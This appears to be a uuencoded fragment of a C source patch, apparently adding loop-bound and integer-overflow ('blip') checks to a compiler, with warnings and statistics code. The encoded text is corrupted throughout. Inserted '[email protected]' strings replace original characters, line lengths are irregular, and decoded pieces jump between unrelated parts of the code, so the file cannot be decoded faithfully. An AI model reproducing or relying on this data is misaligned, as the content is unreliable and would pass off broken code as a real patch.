M9G5N8W1I;[email protected]=&\@[email protected]"!A9V%I;G-T(&EN=&5G97(@97AP;&]I
M*PT-"BLO*B!G;&][email protected]]R(&)L:7`@<W1A=&ES=&EC<R`J+PT-"BMB;&EP
M#0HK#0T**R-D969I;[email protected]$52*'@L>[email protected]"[email protected]/R`H>"`J(#$P,"DO>2`Z(#`-
M#0HK#0T**R\J('!R:6YT(&)L:7`@<W1A=&ES=&EC<R!T;R!T:&[email protected]<W1D97)R
M("HO#0T**W9O:[email protected]#0T**V)L:7!?<W1A=%]P<FEN="AF<"D-#0HK"49)3$4J
M7V)L:7!?<W1A="[email protected]<F5T=7)N.PT-"BL)#0T**PEI9BAF<"`]/2`P*2`-#0HK
M#0T**PT-"BLO*B!P<FEN="!A('=A<FYI;F<@;65S<V%[email protected];VYL>2!D;R!S
M;R!I9B!T:&[email protected]<FEG:'[email protected]=V%R;FYI;F<@9FQA9R!I<R!T=7)[email protected]#0T**R`J
M/2!314Q&7T-(14-+*7L-#0HK"[email protected]%)%15]#3T1%("AL;V]P7VQI
M:[email protected]/2!.15]&3U([#0T**PD)"0EB<F5A:SL-#0HK#0T**PD)"6-A<[email protected])
M3$5?4U1-5#H-#0HK"0D)"7=A<FY?:[email protected]/2!.15]72$E,13L-#0HK"0D)"6)R
M96%K.PT-"BL-#0HK"0D)8V%S92!#04Q,7T584%(Z#0T**PD)"6-A<[email protected]$
M4E]%6%[email protected]"BL)"0D)=V%R;E]I9"`]($Y%7T-!3$P[#0T**PD)"0EB<F5A
M#0T**[email protected]=V%R;E]I9"E[#0T**PD)8V%S92!.15]&3U(Z#0T**PD)
M96%K.PT-"BL)"6-A<[email protected]?5TA)3$4Z#0T**PD)"6EF*"%W87)N7V)L:7!?
M92!.15]#04Q,[email protected]"BL)"[email protected]=V%R;E]B;&EP7V-A;&Q?;F]T7V5M:70I
M"BL-#0HK#0T**R\J(&)U:6QD(&[email protected]%L;"!T;R!T:&[email protected]<%]V:6]L871I
M;[email protected];VXN('5S:6YG('1H92!A<F<@97AP(&%S('1H92`-#0HK("[email protected]
[email protected]/0T-"BL)"6)U:[email protected]*$953D-424].7T1%0TPL(&=E=%]I9&5N
M#0T**PE$14-,7T%25$E&24-)[email protected]*&)L:7!?=FEO;&%T:6]N7V1E8VPI(#[email protected]
M,3L-#0HK"41%0TQ?15A415)[email protected]*&)L:7!?=FEO;&%T:6]N7V1E8VPI(#[email protected]
M#0T**PE44D5%7U!50DQ)0R`H8FQI<%]V:6]L871I;VY?9&5C;"[email protected]/2`Q.PT-
M#0T**[email protected]<&%R86US*2!R971U<[email protected],3#L-#0HK"0T-"BL)[email protected]
[email protected]:[email protected];[email protected]&5C;"XN*B\)#0T**PEI9BA44D5%7T-/[email protected]*&)L
M:7!?9G5N8U]D96-L*2`A/2!&54Y#5$E/3E]$14-,*7L-#0HK"0ER971U<[email protected]
M>'`[#0T**WT-#0HK#0T**R\J(`E#<F5A=&[email protected]!C:&5C:R!E>'`@9F]R('1H
M92!B;&EP(&-O;F1I=&EO;B!T:&[email protected]('=I;&[email protected]@;[email protected]].1%]%6%!2
M(`T-"[email protected]*B`)='[email protected]('=I;&[email protected]:&%V92!T:&[email protected]]L;&]W:6YG(&9O
M<FUA=#H-#0HK("[email protected]"[email protected];W`Q(#[email protected];W`R*2`F)B`H*&]P,2UO<#(I(#[email protected];6%X
M7VQI;6ET*[email protected](#\@8FQI<%]V:6]L871I;VXH*2`Z(&5X<#[email protected](`T-"[email protected]*@T-
M"[email protected]*B`)=VAE<[email protected];W`Q+V]P,B!A<[email protected]]U;[email protected](&QI;6ET+"!A;[email protected]
M=&AE:7(@;W)D97(@:[email protected]=&AE(&5X<&5R<W-I;[email protected]:7,-#0HK("[email protected]"2!D969I
M;F1E9"!B>2!T:&[email protected]&ER96-T:6]N(&]F('1H92!L;V]P(`T-"[email protected]*@T-"[email protected]
M*B`)($%S(&[email protected];F][email protected]:2!C;W5L9"!H879E(&%D9"!S;VUE(&5X=')A(&QO
M9VEC('1O(&5L:6UI;F%T92!T:&[email protected]]M<&QE>"`-#0HK("[email protected]"2!C:&5C:R!I
M9B!T:&[email protected];&EM:70O8V]U;[email protected])E(&-O;G-T86YT<[email protected]('-I;F-E('1H
M92!O<'1I;6EZ97(@8V%N(`T-"[email protected]*B`)('[email protected]=&AA="!U<"!I="!W:6QL
M(&)E(')E9'5N9&%N="!A;[email protected]!S;[email protected];[email protected];6ES=&%K97,N*B\-#0HK
M90EE>'`[#0T**WL-#0HK#0T**PET<F5E"71T(#[email protected]=F]I9%]T>7!E7VYO9&4[
M+&)L:7!?;6%X.PT-"BL)#0T**PDO*B!A;&[email protected]<F5S<VEO;[email protected]
M9F]R('1H92!C;VYD=&EO;B!C<F5A=&EO;B`J+PT-"BL-#0HK"[email protected]("`@
M;W!?9W1?;6%X.PD)[email protected];W`@/[email protected]@*B\)#0T**PET<F5E"6]P,5]G=%]O
M<#([(`DO*B`H;W`Q(#[email protected];W`R*2`J+PT-"BL)=')E90EM:6YU<[email protected]"0D)[email protected]
M*&]P,2UO<#(I("HO#0T**PET<F5E"6UI;G5S7V=T7VUA>#[email protected]"2\J("@H;W`Q
M+6]P,[email protected]/B!M87A?;&EM:70I("HO#0T**PET<F5E"71?86YD:68[(`D)[email protected]
M=&AE("@I)B8H*2`J+PT-"BL-#0HK"71R964)8V]U;G0["0D)[email protected]=&AE(&-A
M;&-U;&%[email protected]]U;[email protected];&]O<"`J+PD-#0HK"71R964)8V]N9%]T97-T.PD)
[email protected]=&AE(&-O;F1I=&EO;B!T97-T("HO#0T**PET<F5E"6-O;F1?97AP.PD)
[email protected]&AE('=H;VQE(&)L:7`@8V]N9&ET:6]N("HO#0T**PD-#0HK"6EF*&5X
M<"D)='[email protected]/2!44D5%[email protected]*&5X<"D[#0T**PD)#0T**PEO<%]T="`](&QO
M;F=?=6YS:6=N961?='EP95]N;V1E.PT-"BL-#0HK"6)L:7!?;6%X(#[email protected]
M>"[email protected]/2!O<%]T=#L-#0HK#0T**PT-"BL)[email protected]:[email protected];&]O<"!C;W5N=&5R(&]R
M(&QO;W`@;&EM:[email protected])E('-M86QL97(@=&AE;B`T8GET92!I;G1S(`T-"BL)
M("[email protected]&]N="!E=F5N(&)O=&AE<B!T;R!C<F5A=&[email protected]@97AP<F5S<VEO
M;[email protected]*B\-#0HK"6EF*"%44D5%7U194$4H;&]O<%]L:6UI="YC;W5N=&5R*2!\
M;6ET+FQI;6ET*[email protected]/"`S,BE[#0T**PD)#0T**PD)8FQI<%]W87)N:6YG*%-%
M3$9?0TA%0TLL(F)L:7`Z('9A<B!S;6%L;&5R('[email protected];&]N9R(I.PD-#0HK
M"0ER971U<[email protected],3#L-#0HK"7T-#0HK"0T-"BL)<W=I=&-H*%12145?0T]$
M12`H;&]O<%]L:6UI="YS=&UT*2E["0T-"BL-#0HK"6-A<[email protected])3$5?4U1-
M5#H-#0HK"6-A<[email protected]]27U-4350Z#0T**PT-"BL)"0T-"BL)"2\J(&EN(&QO
M;W`@;[email protected]='EP92!W:&[email protected](&9O<B!S;VUE(')E87-O;B!P
M<F5F97(@=&\@8V]M<&%R92`-#0HK"[email protected]*B!T:&[email protected]<F5S=6QT(&]F(")L96XM
M+2(@=&\@82!V86QU92!I;G-T96%D(&]F(&-O;7!A<FEN9R`B;&5N([email protected]#0T*
M*PD)("[email protected]*'1O('[email protected]<F5G:7-T97)S('=H:6-H(&]L9"!L96X_*2!T:&[email protected]
M<F5S=6QT(&ES('[email protected](&%S<W5M92`-#0HK"[email protected]*B!T:&%T(#`@[email protected]
M=VEL;"!B96-O;[email protected],'AF9F9F9F9F9B!E=F5N(&EF('1H92!L;V]P(&ES('5N
M<VEG;F5D("[email protected]"BL)"2`J(%1O(')E<')E<V5N="!T:&[email protected]<F5A;"!D:7-T
M:68H;&]O<%]L:6UI="YD:7(@/[email protected]$5#4D5-14Y4("8F#0T**PD)"512145?
M0T].4U1!3E0H;&]O<%]L:6UI="YL:6UI="[email protected])B8-#0HK"0D)5%)%15])3E1?
M*PD)?0T-"BL)#0T**PD-#0HK"0DO*B!C;VYV97)T('1H92!L:6UI="!A;[email protected]
M8V]U;[email protected]:6YT;R!U;G-I9VYE9"!I;[email protected]:[email protected]=&AE>2!A<[email protected];F]T(`T-"BL)
M"2`J(&%L;')E861Y('-O+B!4:&ES(&-O;G9E<G1I;[email protected]:7,@;F]T('-U<'!O
M<[email protected]=&\@969F96-T('1H92!R96%L(`T-"BL)"2`J('9A<G,N+B`Z*2`J+PT-
M"BL)"6EF*"%44D5%7U5.4TE'3D5$*&QO;W!?;&EM:70N8V]U;G1E<[email protected])B8-
M24=.140H;&]O<%]L:6UI="YL:6UI="[email protected])B8-#0HK"0D)(512145?0T].4U1!
M(#[email protected];&0Q("A#3TY615)47T584%(L;&]N9U]U;G-I9VYE9%]T>7!E7VYO
M*PD)#0T**PD)#0T**PD)[email protected]]N<W1R=6-T('1H92!C:&5C:R!E>'!R97-S
M:6]N<R!D97!E;F1I;F<@;[email protected];&]O<"!D:7)E8W1I;[email protected]*B\-#0HK"0EI9BAL
M*PD)?0T-"BL)"65L<V5[#0T**PD)"6UI;G5S(#[email protected];&[email protected]*$U)3E537T58
M:6UI="YL:6UI="D[#0T**PD)"0T-"BL)"0EO<#%?9W1?;W`R(#[email protected];&[email protected]
M#0HK"0DO*B!I9B!A;[email protected];[email protected]=&AE(&5X<')E<W-I;VYS('=A<R!N;[email protected])E
M871E9"[email protected]%I;"`J+PT-"BL)"6EF*"%M:6YU<R!\?"`A;W`Q7V=T7V]P,[email protected]
M<F5T=7)N($Y53$P[#0T**PD-#0HK"0EM:6YU<U]G=%][email protected]@/2!B=6EL9"`H
M*PD):68H(6UI;G5S7V=T7VUA>"[email protected]<F5T=7)N($Y53$P[#0T**PD)#0T**PD)
M*PD-#0HK"[email protected]=%]A;[email protected]<F5T=7)N($Y53$P[#0T**PD)#0T**PD)
M8V]N9%]T97-T(#[email protected]=%]A;F1I9CL-#0HK"0EC;W5N="`](&UI;G5S.PD-#0HK
M"BL)"6EF*%12145?54Y324=.140H;&]O<%]L:6UI="YL:6UI="[email protected])B8-#0HK
M;V]P7VQI;6ET+FQI;6ET(#[email protected];&0Q("A#3TY615)47T584%(L;&]N9U]U
[email protected]"BL)"6EF*"%O<%]G=%][email protected](')E='5R;B!.54Q,.PT-"BL-#0HK
M"0EC;VYD7W1E<[email protected]/2!O<%]G=%][email protected][#0T**PD)8V]U;[email protected]/2!L;V]P7VQI
M*PDO*B!N;W<@[email protected]=VEL;"!B=6EL9"!T:&[email protected]].1%]%6%!2('5S:6YG('1H
M92!G="!A<R!T:&[email protected]]N9&ET:6]N#0T**[email protected]*B!A(&-A;&[email protected]=&\@;W5R(&)L
M;[email protected]#0T**[email protected]*B!T:&[email protected])G(")E>'`B(&%S(&9A;'-E(&5X<"!O9B!T:&[email protected]
M='0L8V]N9%]T97-T+&)L:7!?=FEO;&%T:6]N7V-A;&PL#0T**PD)"[email protected]
M(#\@97AP(#[email protected]:6YT96=E<E]Z97)O7VYO9&4I.PT-"BL-#0HK"7)E='5R;B!C
[email protected]=VET:"!A($-/3D1?15A04B!I;G-I9&4L('=H:6-H(&-H96-K(&9O<B!B
M;&EP(`T-"[email protected]*B!C;VYD:71I;VXN("HO#0T**PT-"BMT<F5E#0T**V)L:7!?
M.PT-"BL):68H(6-H96-K7V5X<"[email protected]<F5T=7)N($Y53$P[#0T**PD-#0HK"6-H
M96-K7W-T;[email protected]/2!B=6EL9%]S=&UT*$584%)?4U1-5"[email protected]?97AP*3L-
M#0HK#0T**PER971U<[email protected]?<W1M=#L-#0HK?0T-"BL-#0HK#0T**R\J
M"6%D9"!A($-/3D1?15A04B!T;R!T:&[email protected]]R(&EN:[email protected]<W1M="[email protected]&AE(&%D
M9&ET:6]N(&-H96-K('=I;&[email protected]@:[email protected]"[email protected]*@EF;W)[email protected];[email protected]!N
M97<@15A04E]35$U4(&)Y(&UA:VEN9R!T:&[email protected]<F5N="!F;W(@:6YI="!S
M=&UT(&[email protected]#0T**R`J"4-/35!/[email protected](&-H86EN9R!T:&[email protected];F5W
M($584%)?4U1-5"!A="!T:&[email protected](&]F('1H92!E>&ES=&EN9R!O;F4N(`T-
M"[email protected]*B\-#0HK(`T-"BMB;V]L("`-#0HK8FQI<%]E;6ET7V9O<E]L;V]P7V-H
[email protected]*&9O<E]S=&UT*3L-#0HK#0T**PDO*B!(86YD;&[email protected];VYL>2!C
M5%)%15]#3T1%("AF;W)?:6YI="[email protected]([email protected]]35$U4*2![#0T**PD)8FQI
M#0T**PDO*B!B=6EL9"!A(&)L:7`@[email protected]=7-I;F<@=&AE(&=L;V)A;"!L
M97AP*$Y53$Q?5%)%12D[#0T**[email protected]<%]E>'`I>PT-"BL)"6)L:7!?
M7VEN:70L,"[email protected]/[email protected],3%]44D5%*7L-#0HK"0E44D5%7T]015)[email protected]*&9O
M<E]I;FET+#`I(#[email protected]<%]E>'`[#0T**PE]#0T**PEE;'-E>PT-"BL)"2\J
M#0HK"0D)"0D)"0EB;&EP7V5X<"D[#0T**PD-#0HK"[email protected]]M<&]U;F1?
M97AP<[email protected]<F5T=7)N(&9A;'-E.PT-"BL)#0T**PD)[email protected]<F5P;&%C92!C=7)R
M96YT(&9O<B!I;FET(&5X<')E<W-I;[email protected]=VET:"!T:&[email protected];F5W(&-O;7!O=6YD
M(`T-"BL)"2`J(&5X<')E<W-I;[email protected]*B\-#0HK"0D-#0HK"0E44D5%7T]015)!
[email protected]*&9O<E]I;FET+#`I(#[email protected]]M<&]U;F1?97AP<CL-#0HK"7T-#0HK"0T-
M"BL)<F5T=7)N('1R=64[#0T**PD-#0HK?0T-"BL-#0HK+RH)861D(&[email protected]].
M1%]%6%!2(&)E9F]R92!T:&[email protected])3$5?4U1-5"[email protected]&AE(&%D9&ET:6]N(&-H
M96-K('=I;&[email protected]@:[email protected]"[email protected]*@EF;W)[email protected];[email protected]!N97<@15A04E]3
M5$U4+B!3:6YC92!W92!A<[email protected]%L;&5D(&EN(&[email protected]<W1A=&[email protected]=VAE<[email protected]=&AE
M(`T-"[email protected]*@E72$E,15]35$U4('=A<R!N;[email protected]>65T(&%D9&5D('1O('1H92!T
M<F5E+B!W92!W:6QL('-I;7!L>2!A9&[email protected];W5R(&-O;F0N(`T-"[email protected]*B\-#0HK
M#0HK>PT-"BL)=')E90EB;&EP7W-T;70[#0T**PD)#0T**PEB;&EP7W-T;[email protected]
M"BLO*B!C;VYV97)T(&[email protected]%,3%]%6%!2('1O(&[email protected]].1%]%6%!2(&AA=FEN
M9R!T:&[email protected]<"!C:&5C:W,@87,@=&AE(&-O;F0N#0T**R`J(&%N9"!T:&[email protected]
M;W)[email protected]%,3%]%6%!2(&%S('1H92!F86QS92!S:61E(&]F('1H92!E
M>'!R97-S:6]N+B`J+R`-#0HK#0T**[email protected](`T-"BMB;&EP7V5M:71?8V%L
M=')E90EC:&5C:U]E>'`[#0T**PT-"BL)8VAE8VM?97AP(#[email protected]<%]B=6EL
M;R!C;VYV97)T('1H92!E>'`@:6YT;R!O=7(@8VAE8VLL(`T-"BL)("[email protected]=&AE
M;B!R971U<[email protected]=&AE(&]R:6=I;F%L(&5X<'(@*B\-#0HK"6EF*"%C:&5C:U]E
M*WT-#0HK#0T**R\J(&-H96-K(&EF(&[email protected]&5C;"!I<R!P87)T(&]F(&[email protected]<W1M
M="!O<B!A;B!E>'!R(&%S(&[email protected];'9A;'5E#0T**R`J(&EF(&ET(&ES('[email protected]
M8V]N<VED97(@:[email protected],@;6]D:[email protected]#0T**R`J#0T**R`J(%1H:7,@9G5N
M8W1I;[email protected]:7,@<F5C=7)S:79E(&%N9"!T:&[email protected]<W1O<"!C;VYI=&EO;B!I<R!E
M:71H97(-#0HK("[email protected]+2!A('-I;7!L92!E>'!R('=A<R!F;W5N9"!W:&EC:"!A
M;&QO=R!U<R!T;R!F:6=U<[email protected];W5T('[email protected]#0T**R`J(`[email protected]=&AE(&[email protected]
M:7,@;6]D:69I960N#0T**R`J("[email protected]!F=6YC=&EO;B!R96%C:"!A('-T;[email protected]
M+R!E>'!R('1O(&-O;[email protected]@=&\@=F5R9FEY#0T**R`J(`[email protected]*'=E(&-A;B!C
M=F5R>71H:6YG#0T**R`J(`[email protected]:7,@=&]O(&AA<[email protected]=&\@:61E;[email protected]<V\@
M<F5C=7)S:79E(&5N9"!W:&EL92!S=7!P;W)T:6YG(&]N;'[email protected]#0T**R`J(`[email protected]
M8F%S:6,@<[email protected]*2HO#0T**PT-"BL-#0HK#0T**V)O;VP-#0HK8FQI<%]D
M*"%T*2!R971U<[email protected]%L<V4[#0T**PD-#0HK"7-W:71C:"A44D5%7T-/[email protected]
M*'0I*7L-#0HK#0T**PDO*B!H86YD;&[email protected]:[email protected]<VEM<&QE(&-A<V5S('=H
M:6-H(&ES('1Y<&[email protected]=&\@8V]U;G1E<B`-#0HK"2`J(&UO9&EF:6-A=&EO
M;G,@*B\-#0HK"0D-#0HK"0EC87-E($U/1$E&65]%6%[email protected]"BL)"0DO*B!O
M;FQY('1A:[email protected]%R92!O9B!C87-E(&QI:[email protected]*[email protected][email protected]]$24997T584%(@
M=VAE<[email protected]&5C;"`-#0HK"0D)("[email protected]:7,@;[email protected];&5F="!S:61E(&%N9"!A;'-O
M(&]N(')I9VAT('-I9&[email protected]=&]G871H97(@=VET:"!A(`T-"BL)"[email protected]*B!C;VYS
M=&%N="`J+PT-"BL)"0EE>'`@/2!44D5%7T]015)[email protected]*'0L,2D[#0T**PD)
M"6EF*`E44D5%7T]015)[email protected]*'0L,"[email protected]/[email protected]&5C;"`F)@T-"BL)"0D)97AP
M("8F#0T**PD)"0E44D5%7T]015)[email protected]*&5X<"PP*2`]/2!D96-L("8F#0T*
M*PD)"0E44D5%7T]015)[email protected]*&5X<"PQ*2`F)@T-"BL)"0D)5%)%15]#3TY3
M345.5#L-#0HK"0D)"0ER971U<[email protected]=')U93L-#0HK"0D)"7T-#0HK#0T**PD)
M"0ER971U<[email protected]=')U93L-#0HK"0D)?0T-"BL)"0EE;'-E#0T**PD)"0ER971U
M<[email protected]%L<V4[#0T**PT-"BL)"0D-#0HK"0EC87-E(%!214E.0U)%345.5%]%
M6%[email protected]"BL)"6-A<[email protected]$]35$E.0U)%345.5%]%6%[email protected]"BL)"0T-"BL)
M#0HK#0T**PD)8V%S92!,5%]%6%[email protected]"BL)"6-A<[email protected]$5?15A04CH-#0HK
M"0EC87-E($=%7T584%(Z#0T**PD)8V%S92!'5%]%6%[email protected]"BL)"6-A<[email protected]
M:&[email protected]%S92!O9B!S:6UP;&[email protected]]N9&ET:6]N+"!C:&5C:R!F;W(@;6]D:69I
M8V%T:6]N(&]F#0T**PD)"2`J(&]N92!O9B!T:&[email protected]<VED97,N(%1H:7,@=VEL
M;"!H96QP('5S(&EN(&-A<V5S(&QI:[email protected]#0T**PD)"2`J('=H:6QE*&QE;BTM
M*2`J+PT-"BL-#0HK"0D)9F]R*&D],#MI(#[email protected],[email protected]:2LK*7L-#0HK#0T**PD)
M+&DI*2D-#0HK"0D)"0ER971U<[email protected]=')U93L-#0HK"0D)?0T-"BL-#0HK"0D)
M93L)#0T**WT-#0HK#0T**R\J(&9I;[email protected]!D96-L(&]U="!O9B!P87)E;[email protected]
M97AP<B!O<&5R86YD+B!M;W-T('-I;7!L92!C87-E(&ES('=H96X-#0HK("[email protected]
M;W`@:7,@=&AE(&[email protected]:71S96QF+B!A;F]T:&5R('-U<'!O<G1E9"!C87-E
M(&ES('[email protected]=&AE(&]P(&ES(&$-#0HK("[email protected];6]D:69Y(&]R(&EN8W)E;65N
M="`O(&1E8W)E;65N="!E>'!R+"!I;B!T:&ES(&-A<[email protected]=&AE(&9I<G-T(&]P
M97)A;F0-#0HK("[email protected]=VEL;"!B92!T:&[email protected];&]O:V5D(&9O<B!D96-L+B`-#0HK
M("H-#0HK("[email protected]:[email protected]%S97,@;W1H97(@=&AE;B!T:&][email protected][email protected]=VEL;"!N
M;[email protected]"!T:&[email protected]&5C;"[email protected]*B\-#0HK#0T**W1R964-#0HK8FQI<%]F:6YD
M4D5%7T-/1$4H;W`I*7L-#0HK"0EC87-E(%9!4E]$14-,[email protected]"BL)"6-A<[email protected]
M4$%235]$14-,[email protected]"BL)"6-A<[email protected]%3$1?1$5#3#H-#0HK"0EC87-E($E.
M5$5'15)[email protected]"BL-#0HK"0D)<F5T=7)N(&]P.PT-"BL)"0D-#0HK"0DO
M*B!I9B!S:6UP;&[email protected]<B!L;V]K(&EN<VED92XJ+PT-"BL)"6-A<[email protected]%)%
M;"A44D5%7T]015)[email protected]*&]P+#`I*3L-#0HK"0D)#0T**PD)[email protected]:[email protected]%S
M92!L;V]P('9A<B!N965D(&-O;G9E<G1I;VXL('=E('=I;&[email protected]"!S;VUE
M(`T-"BL)"2`J(&YO<"!E>'!R97-S:6]N<R`J+PT-"BL)"6-A<[email protected]]07T58
M<[email protected]<%]F:6YD7V1E8VPH5%)%15]/4$5204Y$("AO<"PP*2D[#0T**PD)
M#0HK#0T**R\J(&QO;[email protected]:6YS:61E(&[email protected]%,3%]%6%!2+"!A;[email protected]"!T
M:&[email protected];[email protected];F%[email protected]=&AE;B!S96%[email protected]@#0T**R`J(&9U;F-T:6]N
M(&YA;[email protected]:[email protected]<"!L:7-T+"!A;[email protected])E871E(&[email protected](FQO;W!?;&EM:70B
M('-T=7)C="!U<VEN9PT-"[email protected]*B!T:&[email protected]:"!P87)A;2!A<R!L:6UI="[email protected]
M8V]N<W1A;[email protected],"!A<R!C;W5N=&5R+"!A;[email protected]<V5T(&1I<F5C=&EO;B`-#0HK
M("[email protected]=&\@:6YC<F5M96YT+B`J+PT-"BMB;V]L#0T**V)L:7!?9FEN9%]C86QL
M*PEI;G0)"6DL<&%R86U?:[email protected]]+3$[#0T**PT-"BL)[email protected]=7!D871E('-T
[email protected]%L;"!\?`T-"BL)"2%44D5%7T]015)!3D0H8V%L;"PP*7Q\#0T**PD)
M5%)%15]#3T1%("A44D5%7T]015)[email protected]*&-A;&PL,"DI("$]($%$1%)?15A0
M+#`I*7L-#0HK"0D-#0HK"0EB;&EP7W=A<FYI;F<H3D5?0T%,3"PB8FQI<#[email protected]
M8V%L;"!E>'!R(&1O;[email protected]:&%V92!A9&1R97-S(&5X<'(B*3L)#0T**PD)<F5T
M0TQ?3D%-12`H9G5N8U]D96-L*2!\?`T-"BL)"[email protected]%3E1)1DE%4E]03TE.
M87)N:6YG*$Y%7T-!3$PL(F)L:7`Z(&-A;&[email protected]@<&]I;G1E<B!T;R!F=6YC
M=&EO;B!N;[email protected]<W5P<&]R=&5D(BD[#0T**[email protected]("`)<F5T=7)N(&9A;'-E.PT-
M72YF=6YC7VYA;64I(#[email protected],#MI*RLI>PT-"BL)"6EF*'-T<F-M<"A)1$5.5$E&
M<F%M7VEN9&5X(#[email protected];&]O<%]L:6ME<UMI72YP87)A;5]I;F1E>#L-#0HK"0D)
M;[email protected]]U;[email protected]:[email protected];&]O<%]L:6ME<R!L:7-T('[email protected]&]N="!C;W5N=`T-
M"BL)("[email protected]:[email protected]:[email protected]=&AE(&)L:7!?<W1A="`J+PT-"BL):68H<&%R86U?:6YD
[email protected]@/"`P*7L-#0HK"0EB;&EP7W-T870N=&]T86Q?8VAE8VMS+2T[#0T**PD)
M/3`[(&[email protected]/"!P87)A;5]I;F1E>"`F)B!P87)A;[email protected]:2LK*7L-#0HK"0EP87)A
M;2`](%[email protected]*'!A<F%M*3L-#0HK"7T-#0HK"0T-"BL):68H(7!A
M<F%M*2!R971U<[email protected]%L<V4[#0T**PD-#0HK"6QO;W!?;&EM:70N;&EM:[email protected]
M/2!44D5%7U9!3%5%("AP87)A;2D[#0T**PT-"BL)[email protected]:[email protected]<&%[email protected]:7,@
M8V%L8W5L871E9"!U<VEN9R!A(&9U;F-T:6]N+"!D;VYT(&EN8VQU9&[email protected]=&AA
M=`T-"BL)("[email protected]<B!I;B!T:&[email protected](&ET<[email protected]=&]O(')I<VMY
M:70I*7L-#0HK"0EB;&EP7W=A<FYI;F<H3D5?0T%,3"PB8FQI<#[email protected]<&%[email protected]
M<V5E;7,@=&\@:&%V92!S:61E(&5F9F5C=',B*3L-#0HK"0ER971U<[email protected]%L
M<V4["0D-#0HK"7T-#0HK"0T-"BL);&]O<%]L:6UI="YC;W5N=&5R(#[email protected]:6YT
M96=E<E]Z97)O7VYO9&4[#0T**R`@"6QO;W!?;&EM:70N9&ER(#[email protected]#4D5-
M14Y4.PD-#0HK"0T-"BL)[email protected]('-E96US('1O(&)E(&]K+"!W92!F;W5N
M9"!T:&[email protected];&EM:71S+"!A;[email protected][email protected]%N(`T-"BL)("[email protected]]N=&[email protected]=VET
M<G5E.PT-"BM]#0T**PT-"BL-#[email protected]&]O:R!I;G-I9&[email protected]!L;V]P(&-O
M;F1I=&EO;[email protected]<[email protected]@:[email protected]]N9&ET:6]N(&ES('1O;R`-#0HK
M("[email protected]]M<&QI8V%T960N(&EF(&ET(&ES+"!R971U<[email protected],3"`O+R!&25A-
[email protected](F-O;7!L:6-A=&5D(B!S970-#0HK("H-#0HK("[email protected]]R(&5A
[email protected]@9&5C;"!I;B!T:&[email protected]]N9&ET:6]N+"!C:&5C:R!I9B!D96-L(&ES(&UO
M9&EF:65D(&5I=&AE<@T-"[email protected]*B!I;B!C;VYD(&]R(&5X<'(N(&EF(&ET)W,@
M;6]D:[email protected]]N<VED97(@:[email protected],@=&AE(&-O=6YT97(N#0T**R`J(&EF
M(&UO<[email protected]=&AE;B!O;[email protected]]U;G1E<B!F;W5N9"!R971U<[email protected],3"[email protected]*B\-
M*[email protected]]N9"[email protected]<F5T=7)N(&9A;'-E.PT-"BL)#0T**PDO*B!F:7)S="!V
M97)S:6]N('=I;&[email protected]<W5P<&]R="!O;FQY('9E<[email protected]<VEM<&QE(&-O;F1I=&EO
M;G,@*B\)#0T**[email protected]%)%15]#3T1%("AC;VYD*2E[#0T**PD)8V%S
M92!,5%]%6%[email protected]"BL)"6-A<[email protected]$5?15A04CH-#0HK"0EC87-E($=%7T58
M4%(Z#0T**PD)8V%S92!'5%]%6%[email protected]"BL)"6-A<[email protected]%?15A04CH-#0HK
M"0EC87-E($Y%7T584%(Z#0T**PT-"BL)"0DO*B!F:6YD(&[email protected]=VEL;"!G
[email protected]@;W!E<F%N9"!A;[email protected]<F5T=7)N('1H92`B;6%I;B(-#0HK"0D)("[email protected]
M9&5C;"!T:&%T(')E<')E<[email protected]:70N(`T-"BL)"[email protected]*B`-#0HK"0D)("[email protected]
[email protected]=&AI<R!O<&5R86YD(&ES('!A<[email protected];[email protected]=VAA="!W92!H;W!E(&[email protected]]U
M;G1E<@T-"BL)"[email protected]*B!C;VYD:71I;VXL(&ET<R!G;VEN9R!T;R!B92!E:71H
M97(@=F%R+W!A<F%M(&[email protected];W(@#0T**PD)"2`J(&%N(&5X<'(@[email protected]@
M;W5R(')E<75E<W1E9"!D96-L(&ES('!A<[email protected];V8N("HO#0T**PD)#0T**PT-
M"BL)"0EF;W(H:3TP.R!I(#[email protected],[email protected]:2LK*7L-#0HK"0D-#0HK"0D)"[email protected]
M/2!B;&EP7V9I;F1?9&5C;"A44D5%7T]015)[email protected]*&-O;F0L:2DI.PD)"0T-
M14-++`T-"BL)"0D)"0D)(F)L:7`Z(&-A;[email protected]"!L;V]P(&[email protected]:[email protected]
M8V]N9&ET:6]N(BD[#0T**PD)"0D)[email protected]]N9&ET:6]N('1O;R!C;VUP;&5X
M+"!R971U<[email protected]*B\-#0HK"0D)"0ER971U<[email protected]%L<V4[#0T**PD)"0E]#0T*
M*PT-"BL)"0D)[email protected]@:[email protected]&5C;"!I<R!M;V1I9FEE9"[email protected][email protected]:&]P
M92!T;[email protected]"BL)"0D)("[email protected];6]D:69I8V%T:6]N('[email protected]@87,@:6YC
M<F5M96YT(&]R(&1E8W)E;65N=`T-"BL)"0D)("[email protected]<[email protected][email protected]:&%V92!T
M7VUO9&EF:65D*RL[#0T**PD)"0D);&]O<%]L:6UI="YC;W5N=&5R(#[email protected]&5C
M;#L-#0HK"0D)#0T**PD)"0D)#0T**PD)"0E]#0T**PD)"0DO*B!I9B!N;[email protected]
M;6]D:[email protected];6%[email protected]:71S('1H92!L:6UI="`N<V%V92!I="`-#0HK"0D)
M"2`J(&EN(&-A<[email protected]=&AA="!W92!W:6QL(&9I;[email protected];W1H97(@87,@8V]U;G1E
M<B`J+PT-"BL)"0D)96QS97L-#0HK"0D)"0EL;V]P7VQI;6ET+FQI;6ET(#[email protected]
M*PD)"0T-"BL)"0DO*B!W92!D:61N="!F;W5N9"!O;[email protected]*&%N9"!O;FQY(&]N
[email protected];6]D:[email protected]&5C;"[email protected]#0T**PD)"2`J('-O('=E(&1O;[email protected]:VYO=R!W
M:&EC:"!I<R!T:&[email protected];&EM:[email protected]*&EF(&%T(&%L;"!E>&ES="[email protected]*B\-#0HK"0D)
M9&EF:65D/R`H8F]D>2!N;[email protected]<V5A<F-H960I(BD[#0T**PD)"7T-#0HK"0D)
M"2)B;&EP.B!M;W)E('[email protected];VYE('9A<B!I<R!M;V1I9FEE9"[email protected]=VAO(&ES
M(&-O=6YT97(_(BD[#0T**PD)"0D-#0HK"0D)?0T-"BL)"0ER971U<[email protected]%L
M;FEN9RA314Q&7T-(14-++`T-"BL)"0D)"2)B;&EP.B!C;VYD:71I;[email protected]:7,@
M=&]O(&-O;[email protected]@9F]R('1H:7,@=F5R<VEO;B(I.PT-"BL)"0ER971U<[email protected]
M<B!L;V]P(&QI;6ET<[email protected]:[email protected];&]O<"!S965M<R!T;R!B92!A(&-O=6YT(&QO
